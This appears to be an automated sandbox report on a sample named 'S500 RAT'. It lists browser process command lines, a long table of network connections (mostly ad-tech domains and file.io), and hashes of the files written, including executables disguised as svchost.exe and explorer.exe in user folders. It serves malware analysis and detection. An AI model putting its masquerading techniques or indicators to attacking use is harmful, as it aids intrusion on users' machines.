C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ver"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2440 /prefetch:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 file.io udp
US 45.55.107.24:443 file.io tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
NL 18.239.94.43:443 www.file.io tcp
US 8.8.8.8:53 218.110.86.104.in-addr.arpa udp
US 151.101.3.42:443 hb.vntsm.com tcp
US 151.101.3.42:443 hb.vntsm.com tcp
US 104.22.46.142:443 hb.vntsm.io tcp
US 45.55.107.24:443 file.io tcp
US 216.239.32.36:443 region1.analytics.google.com tcp
BE 142.251.173.155:443 stats.g.doubleclick.net tcp
US 8.8.8.8:53 155.173.251.142.in-addr.arpa udp
US 8.8.8.8:53 46.200.250.142.in-addr.arpa udp
GB 172.217.16.226:443 securepubads.g.doubleclick.net tcp
BE 142.251.173.155:443 stats.g.doubleclick.net udp
GB 172.217.16.226:443 securepubads.g.doubleclick.net udp
GB 172.217.169.3:443 www.google.co.uk tcp
US 172.67.69.19:443 ad-delivery.net tcp
GB 172.217.169.3:443 www.google.co.uk tcp
US 8.8.8.8:53 cdn.exelator.com udp
NL 18.239.70.203:443 c.amazon-adsystem.com tcp
NL 18.65.39.103:443 cdn.exelator.com tcp
NL 18.239.83.89:443 cmp.quantcast.com tcp
NL 18.239.70.203:443 c.amazon-adsystem.com tcp
NL 18.65.39.103:443 cdn.exelator.com tcp
NL 18.239.83.89:443 cmp.quantcast.com tcp
NL 18.238.243.129:443 config.aps.amazon-adsystem.com tcp
US 8.8.8.8:53 secure.cdn.fastclick.net udp
US 104.22.52.86:443 cdn.id5-sync.com tcp
US 172.67.36.110:443 cdn.hadronid.net tcp
GB 104.78.175.230:443 secure.cdn.fastclick.net tcp
GB 104.78.175.230:443 secure.cdn.fastclick.net tcp
US 8.8.8.8:53 id.hadron.ad.gt udp
US 8.8.8.8:53 103.39.65.18.in-addr.arpa udp
US 8.8.8.8:53 89.83.239.18.in-addr.arpa udp
US 8.8.8.8:53 129.243.238.18.in-addr.arpa udp
US 8.8.8.8:53 86.52.22.104.in-addr.arpa udp
US 8.8.8.8:53 110.36.67.172.in-addr.arpa udp
US 8.8.8.8:53 230.175.78.104.in-addr.arpa udp
US 104.22.4.69:443 a.ad.gt tcp
GB 104.86.111.153:80 apps.identrust.com tcp
NL 18.239.36.42:443 cmp.inmobi.com tcp
NL 63.215.202.146:443 proc.ad.cpe.dotomi.com tcp
US 172.67.23.234:443 a.ad.gt tcp
N/A 224.0.0.251:5353 udp
DE 18.197.41.136:443 api.cmp.inmobi.com tcp
US 8.8.8.8:53 aax.amazon-adsystem.com udp
US 8.8.8.8:53 tlx.3lift.com udp
US 8.8.8.8:53 elb.the-ozone-project.com udp
NL 18.239.88.34:443 aax.amazon-adsystem.com tcp
US 8.8.8.8:53 btlr.sharethrough.com udp
US 8.8.8.8:53 prg.smartadserver.com udp
US 8.8.8.8:53 hb-api.omnitagjs.com udp
US 8.8.8.8:53 ib.adnxs.com udp
US 8.8.8.8:53 apex.go.sonobi.com udp
US 8.8.8.8:53 hbopenbid.pubmatic.com udp
NL 145.40.97.67:443 prebid.a-mo.net tcp
DE 3.78.168.176:443 tlx.3lift.com tcp
DE 37.252.172.123:443 ib.adnxs.com tcp
US 69.166.1.8:443 apex.go.sonobi.com tcp
FR 185.86.139.85:443 prg.smartadserver.com tcp
FR 185.86.139.85:443 prg.smartadserver.com tcp
US 172.64.144.78:443 elb.the-ozone-project.com tcp
DE 18.198.238.120:443 btlr.sharethrough.com tcp
DE 18.198.238.120:443 btlr.sharethrough.com tcp
DE 18.198.238.120:443 btlr.sharethrough.com tcp
DE 18.198.238.120:443 btlr.sharethrough.com tcp
FR 185.255.84.151:443 hb-api.omnitagjs.com tcp
GB 185.64.190.77:443 hbopenbid.pubmatic.com tcp
IE 52.18.58.124:443 track.venatusmedia.com tcp
IE 67.220.226.238:443 aax-eu.amazon-adsystem.com tcp
US 52.223.40.198:443 match.adsrvr.org tcp
DE 162.19.138.117:443 id5-sync.com tcp
NL 213.19.162.80:443 pixel.rubiconproject.com tcp
US 104.22.4.69:443 pixels.ad.gt tcp
US 172.67.23.234:443 pixels.ad.gt tcp
US 172.67.23.234:443 pixels.ad.gt tcp
GB 142.250.178.2:443 cm.g.doubleclick.net tcp
GB 142.250.178.2:443 cm.g.doubleclick.net udp
US 172.67.23.234:443 pixels.ad.gt tcp
US 104.22.4.69:443 pixels.ad.gt tcp
NL 46.228.174.117:443 sync.1rx.io tcp
DE 141.95.98.65:443 id5-sync.com tcp
US 34.98.64.218:443 u.openx.net tcp
US 8.8.8.8:53 77.190.64.185.in-addr.arpa udp
US 8.8.8.8:53 120.238.198.18.in-addr.arpa udp
US 8.8.8.8:53 8.1.166.69.in-addr.arpa udp
US 8.8.8.8:53 124.58.18.52.in-addr.arpa udp
US 8.8.8.8:53 238.226.220.67.in-addr.arpa udp
US 8.8.8.8:53 80.162.19.213.in-addr.arpa udp
US 8.8.8.8:53 2.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 198.40.223.52.in-addr.arpa udp
US 8.8.8.8:53 117.138.19.162.in-addr.arpa udp
US 8.8.8.8:53 117.174.228.46.in-addr.arpa udp
US 8.8.8.8:53 218.64.98.34.in-addr.arpa udp
US 8.8.8.8:53 65.98.95.141.in-addr.arpa udp
IE 52.30.187.129:443 p.cpx.to tcp
DE 91.228.74.166:443 pixel.quantserve.com tcp
US 34.120.111.33:443 api.edkt.io tcp
US 104.18.23.145:443 cadmus.script.ac tcp
US 104.26.8.169:443 script.4dex.io tcp
US 45.55.107.24:443 file.io tcp
GB 142.250.187.193:443 76a1b382011ec77ba8bbd4c16d10b327.safeframe.googlesyndication.com tcp
US 104.22.4.69:443 pixels.ad.gt tcp
US 44.205.54.254:443 onsite-tag-logs.apps.nielsen.com tcp
GB 2.23.161.247:443 tg1.aniview.com tcp
US 104.26.8.169:443 script.4dex.io tcp
US 34.95.69.49:443 i.clean.gg tcp
NL 18.239.50.115:443 rules.quantcount.com tcp
IE 108.128.16.222:443 s.cpx.to tcp
GB 142.250.200.33:443 tpc.googlesyndication.com tcp
US 34.95.69.49:443 i.clean.gg udp
US 34.120.111.33:443 api.edkt.io tcp
NL 208.93.169.131:443 bh.contextweb.com tcp
NL 198.47.127.205:443 image2.pubmatic.com tcp
IE 52.48.120.118:443 ad.360yield.com tcp
US 34.120.111.33:443 api.edkt.io udp
GB 216.58.212.226:443 googleads.g.doubleclick.net tcp
GB 216.58.212.226:443 googleads.g.doubleclick.net tcp
FR 185.93.2.248:443 cdn1.vntsm.com tcp
GB 142.250.200.33:443 tpc.googlesyndication.com udp
GB 142.250.200.36:443 www.google.com tcp
GB 104.86.110.33:443 player.aniview.com tcp
US 96.46.186.186:443 track4.aniview.com tcp
NL 213.19.162.90:443 pixel.rubiconproject.com tcp
GB 104.86.111.34:443 feed.avplayer.com tcp
GB 185.64.190.89:443 st.pubmatic.com tcp
GB 2.23.160.192:443 ads.pubmatic.com tcp
US 8.8.8.8:53 115.50.239.18.in-addr.arpa udp
US 8.8.8.8:53 222.16.128.108.in-addr.arpa udp
US 8.8.8.8:53 33.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 131.169.93.208.in-addr.arpa udp
US 8.8.8.8:53 205.127.47.198.in-addr.arpa udp
US 8.8.8.8:53 226.212.58.216.in-addr.arpa udp
US 8.8.8.8:53 118.120.48.52.in-addr.arpa udp
US 8.8.8.8:53 248.2.93.185.in-addr.arpa udp
GB 216.58.212.226:443 googleads.g.doubleclick.net udp
GB 142.250.200.36:443 www.google.com udp
GB 104.86.110.33:443 content1.avplayer.com tcp
GB 104.86.110.33:443 content1.avplayer.com tcp
GB 2.23.161.247:443 tg1.aniview.com tcp
US 34.120.111.33:443 cdn.edkt.io udp
US 173.0.146.6:443 go1.aniview.com tcp
US 13.248.245.213:443 eb2.3lift.com tcp
US 151.101.1.108:443 acdn.adnxs.com tcp
US 8.8.8.8:53 pixel-sync.sitescout.com udp
NL 35.214.149.91:443 x.bidswitch.net tcp
NL 193.0.160.131:443 p.rfihub.com tcp
NL 178.250.1.9:443 dis.criteo.com tcp
US 216.200.232.249:443 sync.mathtag.com tcp
US 34.36.216.150:443 pixel-sync.sitescout.com tcp
US 34.120.133.55:443 api.rlcdn.com tcp
US 54.225.145.9:443 sync.srv.stackadapt.com tcp
US 54.225.145.9:443 sync.srv.stackadapt.com tcp
FR 178.250.7.13:443 dnacdn.net tcp
IE 52.48.73.249:443 match.prod.bidr.io tcp
NL 185.184.8.90:443 creativecdn.com tcp
FR 185.255.84.153:443 visitor.omnitagjs.com tcp
NL 147.75.84.158:443 sync.a-mo.net tcp
US 34.36.216.150:443 pixel-sync.sitescout.com udp
US 104.16.79.73:443 static.cloudflareinsights.com tcp
FR 178.250.7.13:443 dnacdn.net tcp
US 8.8.8.8:53 onetag-sys.com udp
US 8.8.8.8:53 secure.adnxs.com udp
NL 154.57.158.25:443 ads.stickyadstv.com tcp
NL 89.149.192.245:443 ssbsync.smartadserver.com tcp
US 69.166.1.67:443 sync.go.sonobi.com tcp
US 8.8.8.8:53 108.1.101.151.in-addr.arpa udp
US 8.8.8.8:53 213.245.248.13.in-addr.arpa udp
US 8.8.8.8:53 91.149.214.35.in-addr.arpa udp
US 8.8.8.8:53 55.133.120.34.in-addr.arpa udp
US 8.8.8.8:53 150.216.36.34.in-addr.arpa udp
US 8.8.8.8:53 9.1.250.178.in-addr.arpa udp
US 8.8.8.8:53 90.8.184.185.in-addr.arpa udp
US 8.8.8.8:53 131.160.0.193.in-addr.arpa udp
US 8.8.8.8:53 13.7.250.178.in-addr.arpa udp
US 8.8.8.8:53 153.84.255.185.in-addr.arpa udp
US 8.8.8.8:53 249.73.48.52.in-addr.arpa udp
US 8.8.8.8:53 158.84.75.147.in-addr.arpa udp
US 8.8.8.8:53 9.145.225.54.in-addr.arpa udp
US 69.166.1.67:443 sync.go.sonobi.com tcp
NL 89.149.192.245:443 ssbsync.smartadserver.com tcp
NL 154.57.158.25:443 ads.stickyadstv.com tcp
DE 3.121.240.222:443 match.sharethrough.com tcp
NL 35.214.149.91:443 x.bidswitch.net tcp
GB 104.86.110.33:443 content1.avplayer.com udp
NL 154.57.158.25:443 ads.stickyadstv.com tcp
NL 46.228.174.117:443 sync.1rx.io tcp
US 34.98.64.218:443 u.openx.net udp
GB 104.86.110.33:443 content1.avplayer.com tcp
GB 104.86.110.33:443 content1.avplayer.com tcp
IE 54.76.134.176:443 ap.lijit.com tcp
IE 54.76.134.176:443 ap.lijit.com tcp
US 96.46.186.176:443 s2s.aniview.com tcp
US 8.2.110.134:443 cs.krushmedia.com tcp
GB 23.215.239.190:443 secure-assets.rubiconproject.com tcp
US 8.2.110.134:443 cs.krushmedia.com tcp
US 104.19.159.19:443 assets.a-mo.net tcp
DE 3.75.62.37:443 ups.analytics.yahoo.com tcp
US 96.46.186.182:443 sync.aniview.com tcp
US 96.46.186.182:443 sync.aniview.com tcp
US 96.46.186.182:443 sync.aniview.com tcp
US 96.46.186.182:443 sync.aniview.com tcp
US 96.46.186.182:443 sync.aniview.com tcp
DE 51.38.120.206:443 onetag-sys.com tcp
US 52.205.107.134:443 ssp.disqus.com tcp
US 96.46.186.182:443 sync.aniview.com tcp
DE 52.57.233.5:443 optimized-by.rubiconproject.com tcp
GB 216.58.204.74:443 imasdk.googleapis.com tcp
GB 2.19.169.222:443 eus.rubiconproject.com tcp
US 8.8.8.8:53 182.186.46.96.in-addr.arpa udp
US 8.8.8.8:53 74.204.58.216.in-addr.arpa udp
US 8.8.8.8:53 134.107.205.52.in-addr.arpa udp
US 8.8.8.8:53 222.169.19.2.in-addr.arpa udp
US 96.46.186.15:443 track1.avplayer.com tcp
NL 46.228.174.115:443 targeting.unrulymedia.com tcp
GB 216.58.204.74:443 imasdk.googleapis.com udp
GB 216.58.201.102:443 s0.2mdn.net tcp
GB 142.250.187.226:443 pubads.g.doubleclick.net tcp
GB 142.250.187.226:443 pubads.g.doubleclick.net tcp
GB 142.250.187.226:443 pubads.g.doubleclick.net tcp
GB 142.250.187.226:443 pubads.g.doubleclick.net tcp
US 142.250.101.120:443 csi.gstatic.com tcp
US 142.250.101.120:443 csi.gstatic.com tcp
US 142.250.101.120:443 csi.gstatic.com tcp
GB 142.250.187.226:443 pubads.g.doubleclick.net udp
US 142.250.101.120:443 csi.gstatic.com tcp
NL 18.65.39.39:443 public.servenobid.com tcp
DE 51.38.120.206:443 onetag-sys.com udp
US 67.202.105.21:443 ssc-cms.33across.com tcp
NL 18.239.50.8:443 api-2-0.spot.im tcp
NL 35.214.244.54:443 csync.loopme.me tcp
US 70.42.32.63:443 b1sync.zemanta.com tcp
US 70.42.32.63:443 b1sync.zemanta.com tcp
NL 198.47.127.18:443 image8.pubmatic.com tcp
IE 52.51.67.139:443 jadserve.postrelease.com tcp
US 18.214.68.92:443 cs-server-s2s.yellowblue.io tcp
US 80.77.87.166:443 cs.admanmedia.com tcp
US 192.132.33.67:443 bttrack.com tcp
US 35.244.174.68:443 id.rlcdn.com tcp
IE 52.215.200.207:443 a.audrte.com tcp
FR 164.132.25.184:443 rtb-csync.smartadserver.com tcp
US 80.77.87.166:443 cs.admanmedia.com tcp
US 8.8.8.8:53 92.68.214.18.in-addr.arpa udp
US 8.8.8.8:53 67.33.132.192.in-addr.arpa udp
FR 185.86.139.85:443 prg.smartadserver.com tcp
US 69.166.1.8:443 apex.go.sonobi.com tcp
US 142.250.101.120:443 csi.gstatic.com udp
US 80.77.87.166:443 cs.admanmedia.com tcp
US 80.77.87.166:443 cs.admanmedia.com tcp
NL 82.145.213.8:443 t.adx.opera.com tcp
NL 213.19.162.90:443 pixel-eu.rubiconproject.com tcp
DE 3.122.34.216:443 rtb.mfadsrvr.com tcp
FR 178.32.210.230:443 ssbsync-global.smartadserver.com tcp
FR 178.32.210.230:443 ssbsync-global.smartadserver.com tcp
NL 46.228.174.117:443 sync.1rx.io tcp
US 69.166.1.67:443 sync.go.sonobi.com tcp
NL 18.239.18.40:443 cs-rtb.minutemedia-prebid.com tcp
GB 2.23.160.20:443 hbx.media.net tcp
IE 34.254.79.166:443 ads.servenobid.com tcp
US 104.18.42.227:443 cdn.dxkulture.com tcp
IE 54.77.212.111:443 ce.lijit.com tcp
US 52.46.130.91:443 s.amazon-adsystem.com tcp
US 172.64.151.101:443 ssum.casalemedia.com tcp
NL 77.245.57.72:443 sync.adkernel.com tcp
US 52.46.130.91:443 s.amazon-adsystem.com tcp
NL 46.228.174.117:443 sync.1rx.io tcp
US 69.166.1.67:443 sync.go.sonobi.com tcp
US 80.77.87.166:443 cs.admanmedia.com tcp
DE 3.122.34.216:443 rtb.mfadsrvr.com tcp
DE 3.122.34.216:443 rtb.mfadsrvr.com tcp
DE 3.122.34.216:443 rtb.mfadsrvr.com tcp
US 8.8.8.8:53 111.212.77.54.in-addr.arpa udp
US 8.8.8.8:53 91.130.46.52.in-addr.arpa udp
US 8.8.8.8:53 bid.g.doubleclick.net udp
IE 52.48.195.236:443 g2.gumgum.com tcp
IE 52.48.195.236:443 g2.gumgum.com tcp
GB 185.64.190.81:443 simage4.pubmatic.com tcp
GB 185.64.190.81:443 simage4.pubmatic.com tcp
US 169.197.150.7:443 match.deepintent.com tcp
US 54.157.68.100:443 sync.ipredictive.com tcp
IE 52.51.201.51:443 pr-bh.ybp.yahoo.com tcp
JP 124.146.153.165:443 tg.socdm.com tcp
DK 37.157.4.29:443 c1.adform.net tcp
IE 34.247.205.196:443 usersync.gumgum.com tcp
IE 34.247.205.196:443 usersync.gumgum.com tcp
IE 34.247.205.196:443 usersync.gumgum.com tcp
JP 124.146.153.165:443 tg.socdm.com tcp
IE 34.247.205.196:443 usersync.gumgum.com tcp
US 80.77.87.166:443 cs.admanmedia.com tcp
US 35.186.253.211:443 rtb.openx.net tcp
US 35.186.253.211:443 rtb.openx.net udp
NL 79.127.227.46:443 id.rtb.mx tcp
NL 79.127.227.46:443 id.rtb.mx tcp
NL 79.127.227.46:443 id.rtb.mx tcp
NL 79.127.227.46:443 id.rtb.mx tcp
GB 185.64.190.84:443 ow.pubmatic.com tcp
GB 185.64.190.84:443 ow.pubmatic.com tcp
NL 213.19.162.71:443 prebid-server.rubiconproject.com tcp
NL 213.19.162.71:443 prebid-server.rubiconproject.com tcp
US 45.55.126.71:443 ads.dxkulture.com tcp
US 45.55.126.71:443 ads.dxkulture.com tcp
NL 193.3.178.3:443 ads.us.e-planning.net tcp
US 45.55.126.71:443 ads.dxkulture.com tcp
NL 77.245.57.72:443 sync.adkernel.com tcp
DE 79.127.216.47:443 id.rtb.mx tcp
DE 79.127.216.47:443 id.rtb.mx tcp
DE 79.127.216.47:443 id.rtb.mx tcp
DE 79.127.216.47:443 id.rtb.mx tcp
DK 37.157.4.29:443 c1.adform.net tcp
US 45.55.126.71:443 ads.dxkulture.com tcp
US 45.55.126.71:443 ads.dxkulture.com tcp
FR 164.132.25.184:443 rtb-csync.smartadserver.com tcp
NL 178.250.1.7:443 ssp-sync.criteo.com tcp
FR 178.32.210.230:443 ssbsync-global.smartadserver.com tcp
FR 178.32.210.230:443 ssbsync-global.smartadserver.com tcp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 0e10a8550dceecf34b33a98b85d5fa0b
SHA1 357ed761cbff74e7f3f75cd15074b4f7f3bcdce0
SHA256 5694744f7e6c49068383af6569df880eed386f56062933708c8716f4221cac61
SHA512 fe6815e41c7643ddb7755cc542d478814f47acea5339df0b5265d9969d02c59ece6fc61150c6c75de3f4f59b052bc2a4f58a14caa3675daeb67955b4dc416d3a

\??\pipe\LOCAL\crashpad_4072_DJRBNLFHLQIOUTRN

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 3b1e59e67b947d63336fe9c8a1a5cebc
SHA1 5dc7146555c05d8eb1c9680b1b5c98537dd19b91
SHA256 7fccd8c81f41a2684315ad9c86ef0861ecf1f2bf5d13050f760f52aef9b4a263
SHA512 2d9b8f574f7f669c109f7e0d9714b84798e07966341a0200baac01ed5939b611c7ff75bf1978fe06e37e813df277b092ba68051fae9ba997fd529962e2e5d7b0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 e9c578b1c1b5a43ccf3d24ec802695df
SHA1 57a276b765d8aaff6b3c09d28e515816c1621f70
SHA256 193fbb98264f8ba47f3549d8e11f097f37995b09b926b482738e4222b92ac12a
SHA512 8f4f82aebfddb9dfbe236a45af1443d36aefb9ba33ffd7a9e61c8227456e47c72945599468d44bb8869a15ca6e54b80d039b6471dd6f943fd2d432b6481430a6

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 7f90ebe7923b35cb1258687796069a2e
SHA1 c427b64c414d9227651a467a93594ea33a04116d
SHA256 e8555038303a25d063dee3ca242536e89c1712eb36aae105c14b9d86dc26df51
SHA512 997bb2352755a080353a5bc33834be12b1d88f479b3bfd05259209fa460a901b6adb97f0169de9a8124c3862968783894c9c4828c9474ab8d8c675a324e2cd5c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 e72b5b9f93cd456131764f6c821aa8bd
SHA1 a014d2ee7717496299d5038f6eaca51b830c73e7
SHA256 8e041652d69e49c2c759def7d1d9051aba9d693e732ed0727b89924c9de484bd
SHA512 bd948ffcccd6f0f110b56d75282552bdf554e3c7f197452cd598c999e7047acfdebee58f4779fc1d71a15fad2727e8c341d8793848181998cfa9016ecbf79149

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000024

MD5 4322f0449af173fb3994d2bef7ecb2e4
SHA1 b6ee5c6f76b8eee448f6b4b2b56fa1ec39653934
SHA256 0502e6e2f3fc54a30dea0eb07eb19a395c7ea6fc273321a49a4cc977a59b7cc9
SHA512 d8bae6131a5a8a1fcabb2d7efebc6cdbba27955fb77484a5d87dbce7a237c0cd5e19b74b4dad28312929ad732d3b80cf3d7f15f059c88438d0bc6ff9535ceeef

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_prebid.a-mo.net_0.indexeddb.leveldb\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe57cc29.TMP

MD5 403b37e5a015e522e21907a98ffac8e0
SHA1 cb135cac9dda15f697a8f5397d2994b236e2d884
SHA256 b65ff529070ebabb94b93fc21074e182e609165858089923017debb81da408e9
SHA512 0701b033ae9416a9d41761cd5382b03327ee91f2bad76d96d197d75318bb377e5e849cf5e47177c49b37fcb467702fe4e702a9b1c3c13382348436defdcf8a31

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\ab21fdfa-129e-4c38-9637-3c52f9d33bb2.tmp

MD5 1277f1e51603f6f41ebdf61ab03dd0a6
SHA1 d4d347b1b41b11d2e4aa7a67a6c6e63982a8d38f
SHA256 2292bf4a0ffe617214e7368b44b0470a819a53cd4821e206c6d5ca40018ceeaa
SHA512 31afd54f372273436341999005f5f5e001ab1f195f2ac78f4a35dad16ef919db47625299374e15265a3c530fe17bdcea4fd67e29c4e29ca1b161dfcfa297ab5d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 d60186b1508f394872b3cafd4a9dbe68
SHA1 73e63e5b502943443a7fccac57acfe6b5595de43
SHA256 bc432f0b4c185b17d291d25aabc1b5e4854e3677e9730c7f0de7182594bce067
SHA512 0941a6a3de156d91d535e49ad2e872d281492d5bfce8d84de401aa3f11d3e0984a5247815efa62bc33d486503bcd302d3c637e1c1a8c17e2fb0a7470c636d1ad

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 f78210101ce7b7ebc77fca102889483c
SHA1 e8a8ab4634b95840a990168ddf2a424d041425e5
SHA256 1ae3a97c4ee0b1cd8b97cc7228e770f8b5d59c8cabe5cdeac3065d4278d479a0
SHA512 f9f8a141edecedc2541f9c2fdceef64b705a3a70098c2f17c69af5971607fc8673f346e66852b22212065eb345dd641940495f3fe226edf57cc7d94b72af2eae

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 5a95222fdb9782ae8c413036d7cc155a
SHA1 42cadfaba3580b6c1af1ecbecb98aa1edd8e26c7
SHA256 992f2673dc1e66274790d269c085ad13bd754461a4f502c09b8cd1750c711c49
SHA512 cc477a9b63b25189069edbbedc8a7ed95d7c392397e426a83e05b89ed6055a71ba7db7eac46b06b5663275f27b56a069d657e045bc0a0a49acb6dc4d1bacd164

C:\Users\Admin\Downloads\S500 RAT.zip:Zone.Identifier

MD5 fbccf14d504b7b2dbcb5a5bda75bd93b
SHA1 d59fc84cdd5217c6cf74785703655f78da6b582b
SHA256 eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913
SHA512 aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 3df2138cb6434a325aab0d988a9e5373
SHA1 85870c7017215c04de646964e2671f614f548bb5
SHA256 44788b3cdb8fce1a0156c90f73434cc417fcb98cf34545d82dc17fe6f5843040
SHA512 807820e0b54f67acb46c169e38bb6d53c6e806139f4791a242bf6f59e6522d501c6fe63c3c589aeadf02c014e24329f33c1ed136abccbc278f4ec1549852bf60

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 7194e6493ad2747898f5dad893f80f83
SHA1 53673ef5cc6cbf2c95f52c53561af2df98ec1ca8
SHA256 50f059eb82f118579272b2d8248333252955363bb8eb5e023782594bfeaa5dd0
SHA512 ca55ebb175e42d60650ce639b9d237d2e71081bd3186a09bdb09ce81c200d3109d45ec8daa44c6fd7035039c4c686b083b76a0bdc6aba4c020a074d1893c9bf8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 fef5f30fe1b54fba410ef91a7a017ab4
SHA1 62c7d232a95a7b40ad10e395da8403e915327220
SHA256 ab9d6bce034218737228023d0f6f1091ea79157e296b9557963508379b9dccb6
SHA512 2800446cf7189a78c23b5f4363bf22900045b8bef394f1222c447541cf6dd46ca5cbe5958e43960500227250bc5ce5db5080577d96e9f6f27bcad099c9485481

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 2e05776b5f163a10fa6f1109ed112231
SHA1 e3a9bdfc710b6a46d5b5c614a589dbe0b0fe79e6
SHA256 7d0ad4464357229df6892c7d9bd0acbb28447322e0bd64dea7e34bf0dbfddfef
SHA512 fa46860df5b4a7961f0a6c634cb19d75299407ae6ffb0a13907502e244a84b5394d8fdf00e10755a44833f177b6428d6940f7a970bb6dcdca8d4884b1973965f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 ce8cf3c8ab49fc0c416ac94820ab4916
SHA1 8008482610bfb94717aafaf40ab24bee04d0b9b4
SHA256 cb57180c604213b5e4239028dab4e96ab78ac7d3d2694acbe3264a6321b3a5f6
SHA512 5ab33f0ba921489664c904c7e90ea75db139022bc95aea3512b8e803462d7c48cc3a5125734409f10435c5f73e3cc78ca0fa86b1474182c2f8b417b56f85d19d

C:\Users\Admin\AppData\Local\Temp\svchost.exe

MD5 2ef91bf37b3da8cad6751b665bd4e6af
SHA1 5c15bbc721f91855388861d378cf9d26a140cead
SHA256 5263ecab05efc0fda51526658fdfa446f6108c009b8c2ddc9dd93ba29ea691b7
SHA512 16f1846fde3d65413d1c478b59761cb5b74c5fa4556c7234858010efc05e81e305c9054895e388e9de85f6a55d05d6ac0236ed85dcdce3b82b0a82b4986eb2a3

C:\Users\Admin\AppData\Roaming\explorer.exe

MD5 ce453607540a4b0e0c88476042d31791
SHA1 9fe09b42424e044a7c11aea2f214a3d86de8f5a1
SHA256 9a10c5b653feff9be0898a0ae18f7479e36275896bd4482f1fec237cf9ce619c
SHA512 f0fdcd4e5fdbc03d4a3bb1eee4b69c6bf2585a609f9fc56739e9320d1072a7935ce126e7dc737ad1592f64023c3a17d0e0dd659a5d3a4ee940ca2301e81912ee

memory/1616-461-0x0000000000FA0000-0x000000000100D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI66042\VCRUNTIME140.dll

MD5 f34eb034aa4a9735218686590cba2e8b
SHA1 2bc20acdcb201676b77a66fa7ec6b53fa2644713
SHA256 9d2b40f0395cc5d1b4d5ea17b84970c29971d448c37104676db577586d4ad1b1
SHA512 d27d5e65e8206bd7923cf2a3c4384fec0fc59e8bc29e25f8c03d039f3741c01d1a8c82979d7b88c10b209db31fbbec23909e976b3ee593dc33481f0050a445af

memory/5244-485-0x00007FFD50E30000-0x00007FFD51296000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI66042\python310.dll

MD5 3f782cf7874b03c1d20ed90d370f4329
SHA1 08a2b4a21092321de1dcad1bb2afb660b0fa7749
SHA256 2a382aff16533054e6de7d13b837a24d97ea2957805730cc7b08b75e369f58d6
SHA512 950c039eb23ed64ca8b2f0a9284ebdb6f0efe71dde5bbf0187357a66c3ab0823418edca34811650270eea967f0e541eece90132f9959d5ba5984405630a99857

C:\Users\Admin\AppData\Local\Temp\_MEI66042\base_library.zip

